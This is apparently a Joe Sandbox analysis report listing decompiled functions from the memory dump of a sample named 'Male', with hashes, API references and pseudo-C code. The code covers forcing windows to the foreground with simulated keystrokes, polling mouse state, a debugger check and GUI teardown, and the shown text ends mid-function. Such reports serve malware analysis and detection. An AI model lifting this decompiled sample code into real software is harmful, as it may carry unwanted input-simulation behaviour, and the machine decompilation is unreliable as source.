Instruction ID: 897da9c8cbfeda15e654059c1da43cc242d7d3fbb0c42fd78cc46f3e1e7a6bac
Opcode Fuzzy Hash: 997fb198d9d9c8d1f80e459321f733e97a1fb87e5766ae4d04b294135fcd8a20
Instruction Fuzzy Hash: 02E0653264033956EF3126BF9D0CF5E3AECBF416B8F050110AD05974D0DB61D82082E2

Uniqueness

Uniqueness Score: -1.00%

Function 013B2C4E, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 203200ebffbfa01acf03f02735bed1d4da81ead625d89df46d835f86a919834f
Instruction ID: 14b93aef641e3dd9054738f1ff488e0c4aae8c613707e6d0ef2876853c270706
Opcode Fuzzy Hash: 203200ebffbfa01acf03f02735bed1d4da81ead625d89df46d835f86a919834f
Instruction Fuzzy Hash: 2EF039B1501706CFDB359FA8D4D4856BBE4BF143293108A7EE6D687A20C731A840DF00

Uniqueness

Uniqueness Score: -1.00%

Function 013B2DAA, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 013B2DC8

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 6f20ebd9b2a2bf586509a237b68e363968dd7dbffc5f75a367978f3cc06a5eeb
Instruction ID: 3204dc657b3d5c91cfe37f3f021a62152bb4e3e074139d4b4e98896ac3939ca2
Opcode Fuzzy Hash: 6f20ebd9b2a2bf586509a237b68e363968dd7dbffc5f75a367978f3cc06a5eeb
Instruction Fuzzy Hash: 71F0D47240020DFBDF05CF94CA41A9A7B69FB04318F108559FA159A251D336EA619BA1

Uniqueness

Uniqueness Score: -1.00%

Function 013B7A0C, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 013B7A11

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 22dbb3cb4476849f93f277517d4b66752e1dcfb1b26a8c043b26be238cf4cbbf
Instruction ID: e285b1922a2bfbd4f204c146be3410dde449d7fd12851b7d90fff41e2a3ebb60
Opcode Fuzzy Hash: 22dbb3cb4476849f93f277517d4b66752e1dcfb1b26a8c043b26be238cf4cbbf
Instruction Fuzzy Hash: D3D0A9233420212AE66A313D3C0BD7F841CCBE29A4B04003FFA06CA2A9EC504C0302E0

Uniqueness

Uniqueness Score: -1.00%

Function 013B32E0, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 013B32FF

Part of subcall function 013BB0DB: _wcslen.LIBCMT ref: 013BB0EE

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 8257db9774297e4af6638c189960347fb6afa1007568701fb24763ec37a0546f
Instruction ID: a9ca25f525baa79c1cc7b89d8c3f96cb3884abb689bd01ec4949447e673ae37e
Opcode Fuzzy Hash: 8257db9774297e4af6638c189960347fb6afa1007568701fb24763ec37a0546f
Instruction Fuzzy Hash: 6FE0CD7690012457CB21935C9C05FEB77DDDFC86D4F040075FD05D7248D960DD80C650

Uniqueness

Uniqueness Score: -1.00%

Function 013B62AD, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,013B111D,0144DBF4), ref: 013B62CD

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 10abed696465700efcc52a9d167cd6a87e92384e3146b68010d1960f82646827
Instruction ID: 7eb2c215af99090b7717bffb06f2033bc9c84970dedd69476cb551f94a2b71a1
Opcode Fuzzy Hash: 10abed696465700efcc52a9d167cd6a87e92384e3146b68010d1960f82646827
Instruction Fuzzy Hash: 21E0B6B5900B01CFE3314F1AE945452FBF8FFE52653244A2ED5E586A61E3B0548A8B50

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 013CFC88, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130
keyboardthreadwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E013CFC88(struct HWND__* __ecx) {
				long _v8;
				long _v12;
				long _v16;
				int _v20;
				long _t20;
				int _t24;
				int _t37;
				struct HWND__* _t42;
				intOrPtr _t43;
				long _t48;
				struct HWND__* _t50;

				_t42 = __ecx;
				_t50 = GetForegroundWindow();
				if(_t42 != _t50) {
					if(_t50 == 0) {
						_t50 = FindWindowW(L"Shell_TrayWnd", 0);
					}
					if(IsIconic(_t42) != 0) {
						ShowWindow(_t42, 9);
					}
					_v20 = 0;
					if(SetForegroundWindow(_t42) != 0) {
						_t43 = 2;
						L16:
						return _t43;
					}
					_t48 = GetWindowThreadProcessId(_t50, 0);
					_v16 = _t48;
					_v8 = GetCurrentThreadId();
					_t20 = GetWindowThreadProcessId(_t42, 0);
					_v12 = _t20;
					AttachThreadInput(_v8, _t20, 1);
					AttachThreadInput(_v8, _t48, 1);
					AttachThreadInput(_t48, _v12, 1);
					_t24 = SetForegroundWindow(_t42);
					if(_t24 != 0) {
						_push(3);
						L12:
						_pop(_t43);
						L14:
						AttachThreadInput(_v8, _v12, 0);
						AttachThreadInput(_v8, _t48, 0);
						AttachThreadInput(_t48, _v12, 0);
						goto L16;
					}
					keybd_event(0x12, MapVirtualKeyW(0x12, _t24), _t24, _t24);
					keybd_event(0x12, MapVirtualKeyW(0x12, 0), 2, 0);
					keybd_event(0x12, MapVirtualKeyW(0x12, 0), 0, 0);
					keybd_event(0x12, MapVirtualKeyW(0x12, 0), 2, 0);
					_t37 = SetForegroundWindow(_t42);
					_t48 = _v16;
					if(_t37 == 0) {
						_t43 = _v20;
						goto L14;
					}
					_push(4);
					goto L12;
				}
				return 1;
			}

0x013cfc90
0x013cfc98
0x013cfc9c
0x0140fadb
0x0140fae9
0x0140fae9
0x0140faf4
0x0140faf9
0x0140faf9
0x0140fb00
0x0140fb0b
0x0140fbdc
0x0140fbdd
0x00000000
0x0140fbdf
0x0140fb1b
0x0140fb1d
0x0140fb29
0x0140fb2c
0x0140fb3a
0x0140fb3d
0x0140fb45
0x0140fb4d
0x0140fb50
0x0140fb58
0x0140fbb6
0x0140fbb8
0x0140fbb8
0x0140fbbe
0x0140fbc6
0x0140fbce
0x0140fbd6
0x00000000
0x0140fbd6
0x0140fb70
0x0140fb7f
0x0140fb8d
0x0140fb9c
0x0140fb9f
0x0140fbab
0x0140fbb0
0x0140fbbb
0x00000000
0x0140fbbb
0x0140fbb2
0x00000000
0x0140fbb2
0x00000000

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 013CFC92
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0140FAE3
IsIconic.USER32 ref: 0140FAEC
ShowWindow.USER32(00000000,00000009), ref: 0140FAF9
SetForegroundWindow.USER32(00000000), ref: 0140FB03
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0140FB19
GetCurrentThreadId.KERNEL32 ref: 0140FB20
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0140FB2C
AttachThreadInput.USER32(?,00000000,00000001), ref: 0140FB3D
AttachThreadInput.USER32(?,00000000,00000001), ref: 0140FB45
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0140FB4D
SetForegroundWindow.USER32(00000000), ref: 0140FB50
MapVirtualKeyW.USER32(00000012,00000000), ref: 0140FB65
keybd_event.USER32 ref: 0140FB70
MapVirtualKeyW.USER32(00000012,00000000), ref: 0140FB7A
keybd_event.USER32 ref: 0140FB7F
MapVirtualKeyW.USER32(00000012,00000000), ref: 0140FB88
keybd_event.USER32 ref: 0140FB8D
MapVirtualKeyW.USER32(00000012,00000000), ref: 0140FB97
keybd_event.USER32 ref: 0140FB9C
SetForegroundWindow.USER32(00000000), ref: 0140FB9F
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0140FBC6

Strings

Shell_TrayWnd, xrefs: 0140FADE

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: c62864e9f476dfc3d06cfc7fa8e4f87db5ea87e15014e9b3c90babf8e64b5614
Instruction ID: 88827e4c6d2df6faa4358216c747c5fff10811a56996d9e387a3199c7d6df4a6
Opcode Fuzzy Hash: c62864e9f476dfc3d06cfc7fa8e4f87db5ea87e15014e9b3c90babf8e64b5614
Instruction Fuzzy Hash: 51311E75E40218BBFB316BA65C4AFBF7E6CEB44B50F100466BA05E61E5DAB05D009BA0

Uniqueness

Uniqueness Score: -1.00%

Function 013B1976, Relevance: 7.6, APIs: 5, Instructions: 121
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E013B1976(void* __ecx, struct HWND__** _a4, signed short _a6, intOrPtr _a8) {
				signed short _v6;
				signed int _v12;
				signed int _v16;
				struct tagPOINT _v24;
				struct HWND__* _t55;
				signed short _t56;
				signed int _t58;
				signed short _t60;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				void* _t69;
				struct HWND__* _t71;
				signed short _t74;
				void* _t75;
				void* _t76;
				struct HWND__** _t78;
				struct HWND__* _t81;
				void* _t83;

				_t78 = _a4;
				_t69 = __ecx;
				GetCursorPos( &_v24);
				_t78[0x5b] = _v24.x;
				_t78[0x5c] = _v24.y;
				ScreenToClient( *_t78,  &_v24);
				_t71 = _v24.x;
				_t55 = _v24.y;
				if(_t71 != _t78[0x5d]) {
					L9:
					__eflags = _a8 - 1;
					_t78[0x5d] = _t71;
					_t78[0x5e] = _t55;
					if(__eflags >= 0) {
						E0144336D(_t69, __eflags, 0xfffffff5, _t78, _t71, _t55);
					}
					L2:
					_t12 = _t69 + 0x18; // 0x1
					_t56 = GetAsyncKeyState( *_t12);
					_a6 = _t56 & 0x00008000;
					_t58 = 0;
					_t14 = _t69 + 0x1c; // 0x2
					_v16 = _t58 & 0xffffff00 | _t83 != 0x00000000;
					_t60 = GetAsyncKeyState( *_t14);
					_t81 = _v16;
					_t74 = _t60 & 0x00008000;
					_t62 = 0;
					_t63 = _t62 & 0xffffff00 | _t83 != 0x00000000;
					_v6 = _t74;
					_v12 = 0x8000;
					if(_t81 != _t78[0x5f]) {
						__eflags = _a8 - 1;
						if(_a8 < 1) {
							goto L3;
						}
						__eflags = _t78[0x6a];
						if(_t78[0x6a] == 0) {
							goto L3;
						}
						__eflags = _a6;
						_t76 = _t69;
						_push(_v24.y);
						_push(_v24.x);
						_push(_t78);
						if(__eflags == 0) {
							_push(0xfffffff8);
							E0144336D(_t76, __eflags);
							__eflags = _t78[0x61];
							if(_t78[0x61] == 0) {
								L21:
								_t63 = _v12;
								_t74 = _v6;
								_t78[0x61] = 0;
								goto L3;
							}
							_t66 = GetWindowLongW( *_t78, 0xfffffff0);
							_t76 = _t69;
							_push(_v24.y);
							_push(_v24.x);
							_push(_t78);
							__eflags = _t66 & 0x01000000;
							if(__eflags == 0) {
								_push(0xfffffff4);
							} else {
								_push(0xfffffffa);
							}
							L20:
							E0144336D(_t76, __eflags);
							goto L21;
						}
						_push(0xfffffff9);
						goto L20;
					}
					L3:
					if(_a8 != 0) {
						_t78[0x5f] = _t81;
					}
					if(_t63 != _t78[0x60]) {
						__eflags = _a8 - 1;
						if(_a8 >= 1) {
							_push(_v24.y);
							__eflags = _t74;
							_t75 = _t69;
							_push(_v24.x);
							_push(_t78);
							if(__eflags == 0) {
								_push(0xfffffff6);
							} else {
								_push(0xfffffff7);
							}
							E0144336D(_t75, __eflags);
							_t63 = _v12;
						}
					}
					if(_a8 != 0) {
						_t78[0x60] = _t63;
						return _t63;
					}
					return _t63;
				}
				_t83 = _t55 - _t78[0x5e];
				if(_t83 != 0) {
					goto L9;
				}
				goto L2;
			}

0x013b197f
0x013b1986
0x013b198a
0x013b1993
0x013b199c
0x013b19a7
0x013b19ad
0x013b19b0
0x013b19b9
0x013b1a3a
0x013b1a3a
0x013b1a3e
0x013b1a44
0x013b1a4a
0x013f2d7f
0x013f2d7f
0x013b19c3
0x013b19c3
0x013b19cc
0x013b19d8
0x013b19dc
0x013b19dd
0x013b19e3
0x013b19e6
0x013b19e8
0x013b19f3
0x013b19f8
0x013b19f9
0x013b19fc
0x013b1a00
0x013b1a09
0x013f2d89
0x013f2d8d
0x00000000
0x00000000
0x013f2d93
0x013f2d9a
0x00000000
0x00000000
0x013f2da0
0x013f2da5
0x013f2da7
0x013f2daa
0x013f2dad
0x013f2dae
0x013f2db4
0x013f2db6
0x013f2dbb
0x013f2dc2
0x013f2de9
0x013f2de9
0x013f2dec
0x013f2df0
0x00000000
0x013f2df0
0x013f2dc8
0x013f2dce
0x013f2dd0
0x013f2dd3
0x013f2dd6
0x013f2dd7
0x013f2ddc
0x013f2de2
0x013f2dde
0x013f2dde
0x013f2dde
0x013f2de4
0x013f2de4
0x00000000
0x013f2de4
0x013f2db0
0x00000000
0x013f2db0
0x013b1a0f
0x013b1a13
0x013b1a15
0x013b1a15
0x013b1a21
0x013f2dfc
0x013f2e00
0x013f2e06
0x013f2e09
0x013f2e0c
0x013f2e0e
0x013f2e11
0x013f2e12
0x013f2e18
0x013f2e14
0x013f2e14
0x013f2e14
0x013f2e1a
0x013f2e1f
0x013f2e1f
0x013f2e00
0x013b1a2b
0x013b1a2d
0x00000000
0x013b1a2d
0x013b1a37
0x013b1a37
0x013b19bb
0x013b19c1
0x00000000
0x00000000
0x00000000

APIs

GetCursorPos.USER32(?,?,00000000,00000000,?,013B2641,00000000,000000FF,?,?,?), ref: 013B198A
ScreenToClient.USER32 ref: 013B19A7
GetAsyncKeyState.USER32(00000001), ref: 013B19CC
GetAsyncKeyState.USER32(00000002), ref: 013B19E6

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 30fd4ca2c41cfb7e4eb1b5ad36b88fb1c858d3d1ea141ecf2420bf86f56f3e4e
Instruction ID: c69d52f4876b9cb33aa675aa7631f5dc93b2c09e82b0f219b3c4c21eb00107a0
Opcode Fuzzy Hash: 30fd4ca2c41cfb7e4eb1b5ad36b88fb1c858d3d1ea141ecf2420bf86f56f3e4e
Instruction Fuzzy Hash: 4341923190451AFFEF159F68D854BEEBBB4FF15328F10821AE629A32D0D734A950CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013E29B2, Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 013E2AAA
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 013E2AB4
UnhandledExceptionFilter.KERNEL32(?), ref: 013E2AC1

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: f1c41147367ddf9defcf9fc8a426392aa6950f4e0344202b3c7ac1474bb4e1ef
Instruction ID: 11d34017f633d0e773ad32353f23e23165462c1322302d942e19e5fd775177a2
Opcode Fuzzy Hash: f1c41147367ddf9defcf9fc8a426392aa6950f4e0344202b3c7ac1474bb4e1ef
Instruction Fuzzy Hash: C131C47590122D9BCB21DF68D98879DBBB8BF18714F5041DAE40CA72A0EB709B858F44

Uniqueness

Uniqueness Score: -1.00%

Function 013B6799, Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E013B6799(int _a4) {
				struct HWND__* _v32;
				char _v48;
				void* _v52;
				int _v68;
				void* _v76;
				struct HWND__** _v80;
				struct HWND__* _v84;
				signed int _v88;
				signed int _v92;
				struct HWND__** _v96;
				struct HWND__* _v100;
				void* __edi;
				void* __esi;
				char _t167;
				intOrPtr _t168;
				intOrPtr _t170;
				signed int _t172;
				int _t182;
				struct HMENU__* _t183;
				struct HMENU__* _t185;
				struct HWND__* _t192;
				intOrPtr _t193;
				struct HWND__* _t195;
				intOrPtr _t197;
				struct HMENU__* _t202;
				intOrPtr _t205;
				intOrPtr _t208;
				struct HWND__* _t210;
				signed int _t211;
				intOrPtr _t215;
				struct HWND__* _t217;
				signed int _t223;
				intOrPtr _t224;
				intOrPtr _t231;
				struct HWND__* _t233;
				intOrPtr _t234;
				signed int _t236;
				struct HWND__* _t237;
				struct HWND__* _t247;
				int _t249;
				void* _t252;
				intOrPtr _t253;
				void* _t260;
				int _t262;
				void* _t265;
				intOrPtr _t266;
				intOrPtr _t270;
				void* _t277;
				struct HWND__** _t283;
				signed int _t285;
				signed int _t286;
				struct HWND__* _t287;
				void* _t290;
				struct HWND__* _t291;
				struct HWND__* _t292;
				signed int _t293;
				intOrPtr _t294;
				struct HWND__** _t296;
				signed char _t300;
				struct HWND__* _t301;
				struct HWND__* _t302;
				signed int _t303;
				struct HWND__* _t304;
				intOrPtr _t305;
				struct HWND__* _t306;
				struct HWND__* _t307;
				struct HWND__** _t310;
				signed int _t311;
				int _t313;
				struct HWND__** _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				intOrPtr* _t320;
				signed int _t321;
				signed int _t323;

				_t313 = _a4;
				if(E013BC57C(_t313,  &_v92,  &_v88) == 0) {
					L17:
					_t167 = 0;
					L15:
					return _t167;
				}
				_t168 =  *0x1482930; // 0x0
				_v92 = _v92 | 0xffffffff;
				_t283 =  *((intOrPtr*)( *((intOrPtr*)(_t168 + _v92 * 4))));
				_t170 =  *0x1482944; // 0x19b5930
				_v96 = _t283;
				_t310 =  *( *(_t170 + _v88 * 4));
				_v80 = _t310;
				_t300 = _t310[0x24];
				_t172 = _t300 & 0x000000ff;
				if(_t172 <= 0x11) {
					if(__eflags == 0) {
						SendMessageW(_t310[0xd], 0x1101, 0, _t310[4]);
						L8:
						_t315 = _v96;
						L9:
						if(_t310[0x11] != 0) {
							DeleteObject(_t310[0x11]);
						}
						if(_t310[0x19] != 0) {
							DeleteObject(_t310[0x19]);
						}
						if(_t310[0x1a] != 0) {
							DestroyIcon(_t310[0x1a]);
						}
						if(_t310[0x14] != 0) {
							DestroyWindow(_t310[0x14]);
						}
						_t178 = _v96;
						if(_v96 == _t315[7]) {
							_t315[7] = _v100;
						}
						E013B6F1C(_t315, _t178);
						_t167 = 1;
						goto L15;
					}
					__eflags = _t172 - 0xc;
					if(__eflags > 0) {
						__eflags = _t172 - 0xe;
						if(_t172 < 0xe) {
							L7:
							DestroyWindow( *_t310);
							goto L8;
						}
						__eflags = _t172 - 0xf;
						if(_t172 <= 0xf) {
							__eflags = _t300 - 0xe;
							if(_t300 != 0xe) {
								L95:
								_t182 = DeleteMenu(_t310[3], _t313, 0);
								__eflags = _t182;
								if(_t182 != 0) {
									_t315 = _v96;
								} else {
									_t315 = _v96;
									DeleteMenu(_t315[0x67], _t313, _t182);
								}
								_t183 = _t315[0x67];
								__eflags = _t183;
								if(_t183 != 0) {
									_t185 = GetMenuItemCount(_t183);
									__eflags = _t185;
									if(_t185 == 0) {
										SetMenu( *_t315, _t185);
										DestroyMenu(_t315[0x67]);
										_t126 =  &(_t315[0x67]);
										 *_t126 = _t315[0x67] & 0x00000000;
										__eflags =  *_t126;
									}
								}
								DrawMenuBar( *_t315);
								goto L9;
							}
							_v52 = 0x30;
							E013D2760(_t310,  &_v48, 0, 0x2c);
							_v48 = 4;
							_t192 = GetMenuItemInfoW(_t310[3], _t313, 0,  &_v52);
							__eflags = _t192;
							if(_t192 == 0) {
								goto L95;
							}
							_t301 = _v32;
							_v80 = _t301;
							__eflags = _t301;
							if(_t301 == 0) {
								goto L95;
							}
							_t285 =  *0x1482954; // 0x2
							_t316 = 3;
							__eflags = _t285 - _t316;
							if(_t285 < _t316) {
								L94:
								_t313 = _a4;
								goto L95;
							} else {
								goto L89;
							}
							do {
								L89:
								_t193 =  *0x1482944; // 0x19b5930
								_t195 =  *( *(_t193 + _t316 * 4));
								__eflags = _t195;
								if(_t195 != 0) {
									__eflags =  *((intOrPtr*)(_t195 + 0xc)) - _t301;
									if( *((intOrPtr*)(_t195 + 0xc)) == _t301) {
										__eflags =  *((char*)(_t195 + 0x90)) - 0xf;
										if( *((char*)(_t195 + 0x90)) == 0xf) {
											E013B6F1C(_t316, _t316);
											_t285 =  *0x1482954; // 0x2
											_t301 = _v84;
										}
									}
								}
								_t316 = _t316 + 1;
								__eflags = _t316 - _t285;
							} while (_t316 <= _t285);
							goto L94;
						}
						__eflags = _t172 - 0x10;
						if(_t172 != 0x10) {
							goto L7;
						}
						__eflags = _t310[0x10];
						if(_t310[0x10] != 0) {
							ImageList_Destroy(_t310[0x10]);
						}
						_t286 =  *0x1482954; // 0x2
						_t317 = 3;
						__eflags = _t286 - _t317;
						if(_t286 >= _t317) {
							do {
								_t197 =  *0x1482944; // 0x19b5930
								_t302 =  *( *(_t197 + _t317 * 4));
								__eflags = _t302;
								if(_t302 != 0) {
									__eflags =  *((intOrPtr*)(_t302 + 0x34)) -  *_t310;
									if( *((intOrPtr*)(_t302 + 0x34)) ==  *_t310) {
										__eflags =  *((char*)(_t302 + 0x90)) - 0x11;
										if( *((char*)(_t302 + 0x90)) == 0x11) {
											E013B6F1C(_t317, _t317);
											_t286 =  *0x1482954; // 0x2
										}
									}
								}
								_t317 = _t317 + 1;
								__eflags = _t317 - _t286;
							} while (_t317 <= _t286);
						}
						goto L7;
					}
					if(__eflags == 0) {
						_t318 = 3;
						__eflags =  *0x1482954 - _t318; // 0x2
						if(__eflags < 0) {
							L70:
							_t202 =  *(_t283 + 0x1a0);
							__eflags = _t310[3] - _t202;
							if(_t310[3] != _t202) {
								DestroyMenu(_t310[3]);
								goto L8;
							}
							DestroyMenu(_t202);
							_t315 = _v96;
							_t315[0x68] = _t315[0x68] & 0x00000000;
							goto L9;
						} else {
							goto L62;
						}
						do {
							L62:
							_t205 =  *0x1482944; // 0x19b5930
							_t287 =  *( *(_t205 + _t318 * 4));
							__eflags = _t287;
							if(_t287 == 0) {
								goto L68;
							}
							__eflags =  *(_t287 + 0xc) - _t310[3];
							if( *(_t287 + 0xc) != _t310[3]) {
								goto L68;
							}
							_t208 =  *((intOrPtr*)(_t287 + 0x90));
							__eflags = _t208 - 0xf;
							if(_t208 == 0xf) {
								L67:
								E013B6F1C(_t318, _t318);
								goto L68;
							}
							__eflags = _t208 - 0xe;
							if(_t208 == 0xe) {
								goto L67;
							}
							 *(_t287 + 0xc) =  *(_t287 + 0xc) & 0x00000000;
							L68:
							_t318 = _t318 + 1;
							__eflags = _t318 -  *0x1482954; // 0x2
						} while (__eflags <= 0);
						_t283 = _v96;
						goto L70;
					}
					__eflags = _t172 - 2;
					if(_t172 < 2) {
						goto L7;
					}
					_t319 = 3;
					__eflags = _t172 - _t319;
					if(_t172 <= _t319) {
						_t210 =  *(_t283 + 0x1c4);
						__eflags = _t210;
						if(_t210 > 0) {
							__eflags = _a4 - _t210;
							if(_a4 == _t210) {
								 *(_t283 + 0x1c4) =  *(_t283 + 0x1c4) & 0x00000000;
							}
						}
						goto L7;
					}
					__eflags = _t172 - 0xa;
					if(_t172 == 0xa) {
						_t211 =  *0x1482954; // 0x2
						__eflags = _t211 - _t319;
						if(_t211 < _t319) {
							L56:
							_t303 = _v92;
							 *(_t283 + 0x188) = 0;
							 *((intOrPtr*)(_t283 + 0x18c)) = _t303;
							 *((intOrPtr*)(_t283 + 0x190)) = _t303;
							 *((intOrPtr*)(_t283 + 0x194)) = 0;
							 *((char*)(_t283 + 0x198)) = 0;
							DestroyWindow( *_t310);
							__eflags = _t310[0x10];
							if(_t310[0x10] != 0) {
								ImageList_Destroy(_t310[0x10]);
							}
							goto L8;
						}
						_t311 = _t211;
						do {
							_t215 =  *0x1482944; // 0x19b5930
							_t217 =  *( *(_t215 + _t311 * 4));
							__eflags = _t217;
							if(_t217 != 0) {
								__eflags =  *((char*)(_t217 + 0x90)) - 0xb;
								if( *((char*)(_t217 + 0x90)) == 0xb) {
									E013B6799(_t311);
								}
							}
							_t311 = _t311 - 1;
							__eflags = _t311 - _t319;
						} while (_t311 >= _t319);
						_t310 = _v80;
						_t283 = _v96;
						goto L56;
					}
					__eflags = _t172 - 0xb;
					if(_t172 != 0xb) {
						goto L7;
					} else {
						_v84 =  *((intOrPtr*)(_t283 + 0x190));
						SendMessageW( *(_t283 + 0x188), 0x1308, _t310[0x24] & 0x000000ff, 0);
						_t223 = E013B2184(_v96[0x62]);
						_t224 =  *0x1482944; // 0x19b5930
						_t290 =  *( *((intOrPtr*)( *((intOrPtr*)(_t224 + _t223 * 4)))) + 0x40);
						__eflags = _t290;
						if(_t290 != 0) {
							_t249 = _t310[0x22] & 0x0000ffff;
							__eflags = _t249 - _v92;
							if(_t249 != _v92) {
								ImageList_Remove(_t290, _t249);
							}
						}
						__eflags =  *0x1482954 - _t319; // 0x2
						if(__eflags < 0) {
							L43:
							_t291 = _v84;
							_t315 = _v96;
